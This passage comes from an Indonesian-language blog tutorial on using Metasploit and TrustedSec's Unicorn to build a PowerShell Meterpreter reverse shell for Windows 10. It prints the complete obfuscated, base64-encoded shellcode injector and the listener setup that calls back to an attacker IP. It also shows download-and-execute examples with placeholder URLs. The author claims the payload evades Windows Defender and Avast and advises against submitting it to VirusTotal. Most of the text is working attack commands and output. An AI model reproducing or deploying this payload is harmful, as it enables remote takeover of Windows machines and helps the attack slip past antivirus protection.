/opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode Run msfconsole to get started W: --force-yes is deprecated, use one of the options starting with --allow instead.
Ketika installer selesai, akan ada direktori metasploit-framework / baru di direktori / opt.
Langkah 2
Instal Unicorn
Dengan instalasi Metasploit, repositori GitHub Unicorn dapat dikloning menggunakan git clonegithub.com/trustedsec/unicorn .
git clone https://github.com/trustedsec/unicorn Cloning into 'unicorn'... remote: Counting objects: 340, done. remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340 Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done. Resolving deltas: 100% (215/215), done.
Kemudian, ubah ke direktori Unicorn baru menggunakan perintah cd.
cd unicorn/
Untuk melihat opsi Unicorn yang tersedia dan uraian lengkap setiap serangan, gunakan argumen ./unicorn.py --help .
./unicorn.py --help -------------------- Magic Unicorn Attack Vector v3.1 ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde CRT Example: python unicorn.py <path_to_payload/exe_encode> crt Custom PS1 Example: python unicorn.py <path to ps1 file> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500 Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00) Help Menu: python unicorn.py --help
Ada beberapa opsi Unicorn yang menarik dan efektif. Dalam artikel ini saya akan berfokus pada solusi PowerShell dan Meterpreter.
Langkah 3
Hasilkan Payload
Untuk membuat payload dengan Unicorn, gunakan perintah di bawah ini.
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
Unicorn akan menggunakan modul Metasploit reverse_https untuk terhubung ke alamat IP penyerang menggunakan port yang ditentukan.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode... ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Happy Magic Unicorns. [********************************************************************************************************] -----POWERSHELL ATTACK INSTRUCTIONS---- Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute. Note that you will need to have a listener enabled in order to capture the attack. [*******************************************************************************************************] [*] Exported powershell output code to powershell_attack.txt. [*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
Ketika Unicorn selesai membuat payload, 2 file baru akan dibuat. Yang pertama adalah powershell_attack.txt yang dapat dilihat menggunakan perintah catpowershell_attack.txt. Ini mengungkapkan kode PowerShell yang akan dijalankan pada mesin target Windows 10 dan membuat sambungan meterpreter.
cat powershell_attack.txt powershell /w 1 /C "s''v Mx -;s''v CV e''c;s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());powershell (g''v nU).value.toString() ('JAB0AFQAVgAgAD0AIAAnACQAYwBnACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAWABkACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBnACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHQAVAAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA'+'MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAFYAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQBsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAJABFAGQAIgA7AH0A')"
File lain yang dibuat oleh Unicorn adalah unicorn.rc, file sumber daya yang akan mengotomatisasi konfigurasi dan konfigurasi msfconsole.
Langkah 4
Mulai Msfconsole Menggunakan File Sumber Daya
Untuk memulai Metasploit, jalankan perintah msfconsole -r /opt/unicorn/unicorn.rc.
msfconsole -r /opt/unicorn/unicorn.rc =[ metasploit v4.16.59-dev- ] + -- --=[ 1769 exploits - 1008 auxiliary - 307 post ] + -- --=[ 537 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /opt/unicorn/unicorn.rc for ERB directives. resource (/opt/unicorn/unicorn.rc)> use multi/handler resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5 LHOST => 192.168.1.5 resource (/opt/unicorn/unicorn.rc)> set LPORT 443 LPORT => 443 resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false ExitOnSession => false resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true EnableStageEncoding => true resource (/opt/unicorn/unicorn.rc)> exploit -j [*] Exploit running as background job 0. [-] Handler failed to bind to 192.168.1.5:443 msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
File sumber daya akan secara otomatis mengaktifkan handler ( multi / handler ), mengatur jenis payload ( windows / meterpreter / reverse_https ), mengatur alamat IP penyerang ( LHOST ), mengatur nomor port ( LPORT ), mengaktifkan pengkodean stager (EnableStageEncoding ), dan mulai pendengar msfconsole (mengeksploitasi -j ) - mudah.
Pada titik ini, semua yang ada di sisi penyerang diatur dan siap untuk koneksi yang masuk. Sekarang hanya masalah memverifikasi payload bekerja dan secara efektif melewati Windows Defender danperangkat lunak antivirus.
Langkah 5
Uji Payload (Jangan Mengunggahnya ke VirusTotal)
Dalam pengujian saya, payload PowerShell Unicorn mampu melewati Google Chrome, Windows Defender, dan deteksi antivirus Avast di mesin Windows 10 Enterprise yang sepenuhnya ditambal.
Banyak proyek memperingatkan penguji penetrasi bahaya menggunakan pemindai virus online sepertiVirusTotal. Dalam kasus TheFatRat, pengembang secara eksplisit memperingatkan untuk tidak menggunakan VirusTotal setiap kali program dimulai.
Sebagai seseorang yang secara teratur bereksperimen dengan banyak perangkat lunak penghindaran antivirus, saya sepenuhnya memahami godaan untuk mengetahui apakah payload yang dibuat akan menghindari deteksi
Comments
Post a Comment
WeLcOmE TO My SiTeS